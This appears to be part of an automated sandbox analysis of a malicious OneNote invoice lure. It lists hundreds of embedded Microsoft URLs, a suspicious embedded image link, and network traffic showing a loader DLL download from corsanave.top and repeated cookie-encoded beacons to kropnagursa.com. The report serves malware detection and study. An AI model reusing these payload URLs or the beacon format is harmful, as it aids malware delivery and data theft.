            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://lifecycle.office.com
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://login.microsoftonline.com/
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://login.windows.local
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://make.powerautomate.com
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://management.azure.com
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://management.azure.com/
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://messaging.action.office.com/
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://messaging.action.office.com/setcampaignaction
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://messaging.action.office.com/setuseraction16
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://messaging.engagement.office.com/
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://messaging.lifecycle.office.com/
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://messaging.office.com/
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://my.microsoftpersonalcontent.com
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://ncus.contentsync.
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://ncus.pagecontentsync.
            Source: powershell.exe, 00000004.00000002.449646578.00000000059A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://ods-diagnostics-ppe.trafficmanager.net
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://officeapps.live.com
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://onedrive.live.com
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://onedrive.live.com/embed?
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://otelrules.azureedge.net
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://outlook.office.com
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://outlook.office.com/
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://outlook.office365.com
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://outlook.office365.com/
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://pages.store.office.com/review/query
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://powerlift.acompli.net
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://pushchannel.1drv.ms
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://res.cdn.office.net/polymer/models
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://settings.outlook.com
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://shell.suite.office.com:1443
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://skyapi.live.net/Activity/
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://staging.cortana.ai
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://store.office.cn/addinstemplate
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://store.office.de/addinstemplate
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://substrate.office.com/Notes-Internal.ReadWrite
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://tasks.office.com
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
            Source: Inv_02_02_#6.one, ~Inv_02_02_#6.one.onebackupconstruction.0.dr, 00000059.bin.0.dr, {2DBE074E-3D06-4501-9335-81847E634E3A}.bin.0.dr, Inv_02_02_#6.one.0.dr, {523D1B41-BF52-405B-A016-5C5124CD2609}.0.drString found in binary or memory: https://unitedmedicalspecialties.com/T1Gpp/OI.png
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://web.microsoftstream.com/video/
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://webshell.suite.office.com
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://wus2.contentsync.
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://wus2.pagecontentsync.
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
            Source: 59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drString found in binary or memory: https://www.odwebp.svc.ms
            Source: unknownDNS traffic detected: queries for: corsanave.top
            Source: global trafficHTTP traffic detected: GET /gatef.php HTTP/1.1Host: corsanave.topConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /dll/loader_p2_dll_64_n1_x64_inf.dll36.dll HTTP/1.1Host: corsanave.top
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
